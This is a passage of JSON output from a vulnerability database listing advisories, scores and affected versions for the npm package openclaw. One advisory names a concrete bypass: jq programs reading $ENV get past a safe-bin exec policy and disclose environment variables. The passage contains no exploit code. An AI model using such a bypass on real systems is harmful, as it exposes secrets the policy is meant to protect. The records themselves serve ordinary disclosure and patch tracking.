{ "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w2yd-uw91-9yck" }, { "vulnerability": "VCID-wyat-1259-2kg9" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.4.8" } ], "aliases": [ "CVE-2026-41912", "GHSA-vr5g-mmx7-h897" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z8mj-pnbe-wqej" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/89442?format=api", "vulnerability_id": "VCID-zac2-wjyt-27af", "summary": "OpenClaw: Gateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send\n## Summary\nGateway operator.write Can Reach Admin-Class Talk Voice Config Persistence via chat.send\n\n## Current Maintainer Triage\n- Status: narrow\n- Normalized severity: medium\n- Assessment: Real shipped operator.write to admin-class Talk Voice config persistence bug, but it is the same narrow authenticated persistence class and should be normalized below high.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.24`\n- Patched versions: `>= 2026.3.28`\n- First stable tag containing the fix: `v2026.3.28`\n\n## Fix Commit(s)\n- `e34694733fc64931ed4a543c73d84ad3435d5df1` — 2026-03-25T19:55:26Z\n\n## Release Process Note\n- The fix is already present in released version `2026.3.28`.\n- This draft looks ready for final maintainer disposition or publication, not additional code-fix work.\n\nThanks @zpbrent for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41379", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08343", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08336", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00028", "scoring_system": "epss", "scoring_elements": "0.08354", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41379" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/e34694733fc64931ed4a543c73d84ad3435d5df1", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/e34694733fc64931ed4a543c73d84ad3435d5df1" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3q42-xmxv-9vfr", "reference_id": "", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-3q42-xmxv-9vfr" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41379", "reference_id": "CVE-2026-41379", "reference_type": "", "scores": [], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41379" }, { "reference_url": "https://github.com/advisories/GHSA-3q42-xmxv-9vfr", "reference_id": "GHSA-3q42-xmxv-9vfr", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-3q42-xmxv-9vfr" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7dyw-9b37-yqh4" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7wmr-v7zb-6fc9" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-9xrt-mv81-3yc8" }, { "vulnerability": "VCID-a2wx-7b8h-c3h1" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-axp9-mt9z-gkgw" }, { "vulnerability": "VCID-b9w3-w2nq-cqg6" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-c4yt-z48z-zygv" }, { "vulnerability": "VCID-c76v-4577-n7c6" }, { "vulnerability": "VCID-carm-gpgh-wbbf" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-cvmw-sxfq-dyhz" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-da47-zdf1-mfgf" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fekn-d6f3-xfa6" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-g3hg-peh1-tudm" }, { "vulnerability": "VCID-g8r6-x6s5-uydq" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hd4w-s3dp-nubj" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-j8fb-fhyc-33fu" }, { "vulnerability": "VCID-jdqk-kv8u-xqa9" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-kzgh-7f6h-kfd1" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mcz5-wgu1-z7g7" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7me-4bzz-83cm" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-q9jf-srt4-fbcg" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-s3wz-3yzf-ybhz" }, { "vulnerability": "VCID-sja9-6t41-hud8" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-t991-75e7-ykdv" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-uy97-p1ex-y7df" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vktg-77tu-vycv" }, { "vulnerability": "VCID-vx5d-3d98-7kf3" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-watb-49vx-yub1" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wx44-n3fr-skah" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-x4hn-ygbg-mkep" }, { "vulnerability": "VCID-x794-wfnf-1ugf" }, { "vulnerability": "VCID-x7uw-s9a6-fybd" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xryt-a83q-q7et" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-xvhd-w4tv-tqhr" }, { "vulnerability": "VCID-xz8s-hj5s-wfgj" }, { "vulnerability": "VCID-xzg5-ren5-p7gw" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ykwt-tdpa-3bft" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-ynup-4v9e-tbh4" }, { "vulnerability": "VCID-yp2w-pc58-9bf6" }, { "vulnerability": "VCID-ywrn-52gx-f3ad" }, { "vulnerability": "VCID-z7wa-tw2t-vqas" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zb5t-hhkm-kfeh" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zkum-rn42-yyfs" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.28" } ], "aliases": [ "CVE-2026-41379", "GHSA-3q42-xmxv-9vfr" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zac2-wjyt-27af" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90152?format=api", "vulnerability_id": "VCID-zb5t-hhkm-kfeh", "summary": "OpenClaw: Host exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables\n## Summary\nHost exec environment sanitization misses package, registry, Docker, compiler, and TLS override variables\n\n## Current Maintainer Triage\n- Normalized severity: medium\n- Assessment: v2026.3.28 also misses the broader package, registry, compiler, Docker, and TLS env family in the shipped host-env policy, and the unreleased main fix means this is a real medium-severity open issue.\n\n## Affected Packages / Versions\n- Package: `openclaw` (npm)\n- Latest published npm version: `2026.3.31`\n- Vulnerable version range: `<=2026.3.28`\n- Patched versions: `>= 2026.3.31`\n- First stable tag containing the fix: `v2026.3.31`\n\n## Fix Commit(s)\n- `eb8de6715f02949c21c4e895fffc8a6dcb00975c` — 2026-03-31T19:37:43+09:00\n\nOpenClaw thanks @tdjackey for reporting.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41369", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17279", "published_at": "2026-06-05T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.1724", "published_at": "2026-06-07T12:55:00Z" }, { "value": "0.00054", "scoring_system": "epss", "scoring_elements": "0.17276", "published_at": "2026-06-06T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-41369" }, { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/eb8de6715f02949c21c4e895fffc8a6dcb00975c", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/" } ], "url": "https://github.com/openclaw/openclaw/commit/eb8de6715f02949c21c4e895fffc8a6dcb00975c" }, { "reference_url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/releases/tag/v2026.3.31" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg7q-fg22-4g98", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-cg7q-fg22-4g98" }, { "reference_url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-sanitization-in-host-execution", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" }, { "value": "7.1", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-28T15:01:58Z/" } ], "url": "https://www.vulncheck.com/advisories/openclaw-insufficient-environment-variable-sanitization-in-host-execution" }, { "reference_url": "https://github.com/advisories/GHSA-cg7q-fg22-4g98", "reference_id": "GHSA-cg7q-fg22-4g98", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cg7q-fg22-4g98" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109907?format=api", "purl": "pkg:npm/openclaw@2026.3.31", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": "VCID-75yr-sbce-nkah" }, { "vulnerability": "VCID-7akj-469t-57hz" }, { "vulnerability": "VCID-7ntr-5dr5-9uf8" }, { "vulnerability": "VCID-7snr-fn3u-x3b8" }, { "vulnerability": "VCID-7z2s-k6ty-ekg1" }, { "vulnerability": "VCID-96jd-x87b-s3ey" }, { "vulnerability": "VCID-9hcd-uj62-8yeu" }, { "vulnerability": "VCID-9kgh-wj9w-ykff" }, { "vulnerability": "VCID-9xgq-vtg2-jucq" }, { "vulnerability": "VCID-a46u-tnbh-fyhs" }, { "vulnerability": "VCID-a4jz-y9s4-zkfg" }, { "vulnerability": "VCID-arks-g6hw-abbw" }, { "vulnerability": "VCID-bgwh-spue-yybk" }, { "vulnerability": "VCID-bkya-73v8-bber" }, { "vulnerability": "VCID-c25h-khws-2fc3" }, { "vulnerability": "VCID-cbuu-4d6c-rben" }, { "vulnerability": "VCID-d8v2-gft5-buee" }, { "vulnerability": "VCID-dfdk-dhwf-9yaj" }, { "vulnerability": "VCID-dmse-bb22-rkcj" }, { "vulnerability": "VCID-dv5s-pvw1-a7fu" }, { "vulnerability": "VCID-e25p-j5ed-yqfz" }, { "vulnerability": "VCID-e4ac-qm17-qbf5" }, { "vulnerability": "VCID-fuda-zxu8-gbb4" }, { "vulnerability": "VCID-gk95-28x9-17dk" }, { "vulnerability": "VCID-gkyv-ahk7-1ud3" }, { "vulnerability": "VCID-haxd-ps1x-h3ch" }, { "vulnerability": "VCID-hz33-9efv-c7ef" }, { "vulnerability": "VCID-jshg-1pb2-wbak" }, { "vulnerability": "VCID-k8s8-zjv4-gqdb" }, { "vulnerability": "VCID-kcy2-a98b-uyg7" }, { "vulnerability": "VCID-kxmf-d7w1-xfcv" }, { "vulnerability": "VCID-ma62-gtan-97au" }, { "vulnerability": "VCID-mszk-dr24-xugw" }, { "vulnerability": "VCID-mv8b-cryt-u3g8" }, { "vulnerability": "VCID-mxu5-yjqs-nuap" }, { "vulnerability": "VCID-nkh4-j2pe-1qhr" }, { "vulnerability": "VCID-ns77-4wfj-9ka6" }, { "vulnerability": "VCID-ntwt-jkgr-sffu" }, { "vulnerability": "VCID-nv6g-7gs9-pfan" }, { "vulnerability": "VCID-nw4r-wjgs-8qc1" }, { "vulnerability": "VCID-p7gx-9usz-yyew" }, { "vulnerability": "VCID-p7v5-jqhq-nbhz" }, { "vulnerability": "VCID-p8xd-2um4-9ufr" }, { "vulnerability": "VCID-pae5-uyu7-k3c1" }, { "vulnerability": "VCID-pdmd-a4fg-8fcg" }, { "vulnerability": "VCID-pj41-sunw-vbcj" }, { "vulnerability": "VCID-psms-gauf-tkbz" }, { "vulnerability": "VCID-q6ne-sw1r-xkd1" }, { "vulnerability": "VCID-qedr-a3ay-v3gx" }, { "vulnerability": "VCID-qjss-tvgk-3ubk" }, { "vulnerability": "VCID-r5bw-c2py-9udf" }, { "vulnerability": "VCID-rr6t-1193-ybgz" }, { "vulnerability": "VCID-ry1r-br3q-2uaw" }, { "vulnerability": "VCID-t2ve-xemk-mqa9" }, { "vulnerability": "VCID-t2yy-9ume-t7be" }, { "vulnerability": "VCID-una1-gxkk-t3bp" }, { "vulnerability": "VCID-v9cd-65tf-p3f8" }, { "vulnerability": "VCID-vfbb-bpy9-87ey" }, { "vulnerability": "VCID-vy8v-np82-r3b5" }, { "vulnerability": "VCID-vz7k-r7c4-ebfg" }, { "vulnerability": "VCID-w2tj-nqa6-cuam" }, { "vulnerability": "VCID-w4p1-sxdg-hyha" }, { "vulnerability": "VCID-w58d-6veg-uugy" }, { "vulnerability": "VCID-wmr3-83u3-6qdb" }, { "vulnerability": "VCID-wyce-qxau-mqff" }, { "vulnerability": "VCID-x2ru-ydpv-f3ah" }, { "vulnerability": "VCID-xfgw-ua7r-abbr" }, { "vulnerability": "VCID-xj73-kszs-yygp" }, { "vulnerability": "VCID-xnvm-rp36-vyaj" }, { "vulnerability": "VCID-xsct-xjs7-nbab" }, { "vulnerability": "VCID-y65g-4baa-a7c2" }, { "vulnerability": "VCID-y7sd-j9xn-qffs" }, { "vulnerability": "VCID-ye4t-n6r3-67ab" }, { "vulnerability": "VCID-yhpq-5qy3-y7bn" }, { "vulnerability": "VCID-ymmv-2qmq-6kap" }, { "vulnerability": "VCID-z8mj-pnbe-wqej" }, { "vulnerability": "VCID-zg68-u5b5-vkft" }, { "vulnerability": "VCID-zpte-tgt5-wqcm" }, { "vulnerability": "VCID-zu4s-jnn3-1kd8" }, { "vulnerability": "VCID-zunq-wnnf-k3fw" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/openclaw@2026.3.31" } ], "aliases": [ "CVE-2026-41369", "GHSA-cg7q-fg22-4g98" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zb5t-hhkm-kfeh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90951?format=api", "vulnerability_id": "VCID-zf3q-78js-k7ce", "summary": "OpenClaw safeBins jq `$ENV` filter bypass allows environment variable disclosure\n## Summary\n\nThe jq safe-bin policy blocked explicit `env` usage but still allowed jq programs that accessed environment data through `$ENV`.\n\n## Impact\n\nAn operator-approved safe-bin jq command could disclose environment variables that the safe-bin policy was supposed to keep out of scope.\n\n## Affected Component\n\n`src/infra/exec-safe-bin-semantics.ts`\n\n## Fixed Versions\n\n- Affected: `<= 2026.3.24`\n- Patched: `>= 2026.3.28`\n- Latest stable `2026.3.28` contains the fix.\n\n## Fix\n\nFixed by commit `78e2f3d66d` (`Exec: tighten jq safe-bin env checks`).\n\nThanks @nicky-cc of Tencent zhuque Lab ([https://github.com/Tencent/AI-Infra-Guard](https://github.com/Tencent/AI-Infra-Guard)) for reporting.", "references": [ { "reference_url": "https://github.com/openclaw/openclaw", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw" }, { "reference_url": "https://github.com/openclaw/openclaw/commit/78e2f3d66d74e5c7e6f45c54162e63986e39771b", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/commit/78e2f3d66d74e5c7e6f45c54162e63986e39771b" }, { "reference_url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jccr-rrw2-vc8h", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.7", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-jccr-rrw2-vc8h" }, { "reference_url": "https://github.com/advisories/GHSA-jccr-rrw2-vc8h", "reference_id": "GHSA-jccr-rrw2-vc8h", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-jccr-rrw2-vc8h" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/109863?format=api", "purl": "pkg:npm/openclaw@2026.3.28", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-1j3m-fecr-f7cn" }, { "vulnerability": "VCID-1p5p-eth5-3ufu" }, { "vulnerability": "VCID-1pbz-8rnx-dkhe" }, { "vulnerability": "VCID-258k-a4dw-tfae" }, { "vulnerability": "VCID-26kp-dbu2-pqej" }, { "vulnerability": "VCID-26sg-e29u-hkf3" }, { "vulnerability": "VCID-29a1-7ar7-67e1" }, { "vulnerability": "VCID-2c8p-gbaw-3ye4" }, { "vulnerability": "VCID-2h6a-becf-x7ej" }, { "vulnerability": "VCID-2khh-wv8p-97ff" }, { "vulnerability": "VCID-2mxq-krq5-bycx" }, { "vulnerability": "VCID-2uqu-k42d-1baq" }, { "vulnerability": "VCID-2wr9-h42m-a7ev" }, { "vulnerability": "VCID-356u-h788-pkgt" }, { "vulnerability": "VCID-38g8-39ek-xbat" }, { "vulnerability": "VCID-3wsw-d4z2-dydt" }, { "vulnerability": "VCID-3xmj-n798-x3cw" }, { "vulnerability": "VCID-3zwq-dz2u-pqgv" }, { "vulnerability": "VCID-3zx4-t8cj-kbfn" }, { "vulnerability": "VCID-4316-7q9a-xuhx" }, { "vulnerability": "VCID-4hz5-f2pw-3yb4" }, { "vulnerability": "VCID-4u3z-rs45-gbhe" }, { "vulnerability": "VCID-4urc-4536-pqhk" }, { "vulnerability": "VCID-5rgx-2krs-guck" }, { "vulnerability": "VCID-6wth-qthz-yud8" }, { "vulnerability": "VCID-6y5w-am4s-6qa5" }, { "vulnerability": "VCID-733f-57ds-xugm" }, { "vulnerability": "VCID-73cz-n29z-uqem" }, { "vulnerability": 